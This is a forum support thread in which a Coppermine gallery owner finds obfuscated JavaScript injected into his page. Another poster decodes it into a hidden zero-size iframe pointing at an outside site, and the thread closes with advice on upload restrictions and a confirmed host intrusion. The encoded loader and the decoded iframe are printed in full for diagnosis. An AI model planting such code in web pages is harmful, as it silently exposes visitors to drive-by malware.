Coppermine connects to some other strange url... Coppermine connects to some other strange url...
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Coppermine connects to some other strange url...

Started by maolu, August 23, 2005, 11:19:26 AM

Previous topic - Next topic

0 Members and 3 Guests are viewing this topic.

maolu

I noticed it yesterday.

When i open coppermine's index page, it connects to some other url, something like http://www.carambadeus.com/.
Today i also noticed that browsing my gallery with firefox, it asks me for Java Runtine Environment in order to "properly view the page"...

Is this normal?!?!

Joachim Müller

post a link to your site, how else could we tell?

maolu


maolu

!!!

i found that on top of my page there is THIS:

<script language=javascript>
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286Fliudph%2853vuf%286Gkwws%286D22wudi1vq0qhw1lqir2lqgh%7B1sks%2853iudpherughu%286G3%2853zlgwk%286G3%2853khljkw%286G3%2853vfuroolqj%286Gqr%2853qdph%286Gfrxqwhu%286H%286F2liudph%286H3')
</script>


This is javascript code i can't find in any of the files of coppermine, i cannot understand where is it coming from and i'm sure now that this is the reason of the strange request for Java Runtime Environment!!!

Tranz

Worked fine for me. Maybe it's something to do with your computer.

Nibbler

You need to kill that js, it's opening an iframe to somewhere.

maolu

Quote from: Nibbler on August 23, 2005, 11:26:57 PM
You need to kill that js, it's opening an iframe to somewhere.

I know but it's NOT related to my files!
I never put any js into any page...
I suppose it's something with my internet provider, i just wrote them, i hope they'll answer as soon as possible!!!

kegobeer

Well, whoever put that crap on your site got it from here:

http://scriptasylum.com/tutorials/encdec/encode-decode.html

The code is copied verbatim from that website.  Here's what is actually put on your page:

<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>

dF('%286Fliudph%2853vuf%286Gkwws%286D22wudi1vq0qhw1lqir2lqgh%7B1sks%2853iudpherughu%286G3%2853zlgwk%286G3%2853khljkw%286G3%2853vfuroolqj%286Gqr%2853qdph%286Gfrxqwhu%286H%286F2liudph%286H3')

So, the function dF(s) unescapes whatever string is in dF('...').  This is contained in dF:

<iframe src=http://traf.sn-net.info/index.php frameborder=0 width=0 height=0 scrolling=no name=counter></iframe>

More of the same crap is on that website, pretty much causing a repeating loop to the same websites over and over.  Definitely up to no good.
Do not send me a private message unless I ask for one.  Make your post public so everyone can benefit.

There are no stupid questions
But there are a LOT of inquisitive idiots

maolu

I received a mail from my provider...

They say that probably there has been some sort of hackering over my site and the way to solve it is to change the CHMOD of the coppermine's dir in order to prevent web users to enter. :o :o >:(

I think they're crazy because thousand of people use html uploads without this kind of problems!!!
I'm waiting for an answer from them....

kegobeer

If you allow other than images, you can cause yourself a bit of grief.  You might want to approve all images before they are viewable - this way you can verify what's been uploaded and delete any odd files.
Do not send me a private message unless I ask for one.  Make your post public so everyone can benefit.

There are no stupid questions
But there are a LOT of inquisitive idiots

Joachim Müller

what filetypes do you allow to be uploaded? Never ever allow htm, html, js, asp, php, php3. In fact you should allow pics and that's it. Yes, your site has been hacked. You'll have to find out where the attacker entered: was it a gap you have opened up deliberately, or did they come in through some kind of backdoor (vulnerability).

maolu

I asked my internet provider for this and they say there has been an intusion on their server.

By now they still don't know how it happenend.... >:( :(